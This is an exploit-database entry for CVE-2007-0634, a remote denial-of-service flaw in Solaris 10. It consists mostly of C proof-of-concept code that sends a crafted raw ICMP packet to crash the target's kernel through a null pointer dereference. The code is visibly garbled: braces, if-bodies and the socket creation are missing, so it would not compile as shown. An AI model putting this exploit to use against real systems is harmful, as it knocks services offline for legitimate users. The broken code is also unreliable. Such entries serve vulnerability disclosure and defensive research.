Sun Solaris 10 ICMP Unspecified Remote Denial of Service Vulnerability

EDB-ID: 29540 CVE: 2007-0634 OSVDB-ID: 31878
Verified: Author: kcope Published: 2007-01-30
Download Exploit: Source Raw Download Vulnerable App: N/A

Sun Solaris is prone to a remote denial-of-service vulnerability.

A successful attack can trigger a crash in the operating system, leading to a denial-of-service condition for legitimate users.

Solaris 10 is affected by this issue. 

 SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope
 Null Pointer Dereference in Kernel Space
 Seems to work only if attacked in the same network segment,
 maybe because of firewalls/routers in place.
 This seems to be the issue described in bid 22323.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

unsigned char rawData[77] =
    0x45, 0xFF, 0x00, 0x4D, 0x0C, 0x52, 0x00, 0x00, 0x7E, 0x01, 0x0C, 0xF2, 0xE0, 0x5A, 0x73, 0x12,
    0xC0, 0xA8, 0x0E, 0x58, 0x08, 0xDE, 0xAE, 0x37, 0x6F, 0x3B, 0x66, 0xA7, 0x60, 0xAA, 0x76, 0xC1,
    0xEC, 0xA7, 0x7D, 0xFA, 0x8A, 0x72, 0x8E, 0xC6, 0xE3, 0xD2, 0x64, 0x13, 0xE7, 0x4D, 0xBC, 0x01,
    0x40, 0x5B, 0x8E, 0x8B, 0xE5, 0xEE, 0x5E, 0x37, 0xDD, 0xC2, 0x54, 0x8E, 0x8D, 0xCE, 0x0C, 0x42,
    0x97, 0xA1, 0x8C, 0x04, 0x8A, 0xC2, 0x6B, 0xAE, 0xE9, 0x2E, 0xFE, 0xD4, 0x4B,
} ;

long resolve(char *host)
  struct hostent *hst;
  long addr;

  hst = gethostbyname(host);
  if (hst == NULL)

  memcpy(&addr, hst->h_addr, hst->h_length);
  memcpy(rawData+16, &addr, sizeof(long));


int main(int argc, char *argv[])
  struct sockaddr_in dst;
  long saddr, daddr;
  int s;

  if (argc < 2)
    printf("SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope\n");
    printf("Usage: %s <dst>\n", *argv);

  daddr = resolve(argv[1]);
  saddr = INADDR_ANY;

  memcpy(rawData+16, &daddr, sizeof(long));
//  memcpy(rawData+12, &saddr, sizeof(long));

  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;

  if (s == -1)

  printf("Sending ICMP packet: %s\n", argv[1]);

      if (sendto(s,&rawData,77,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1)
        perror("Error sending packet");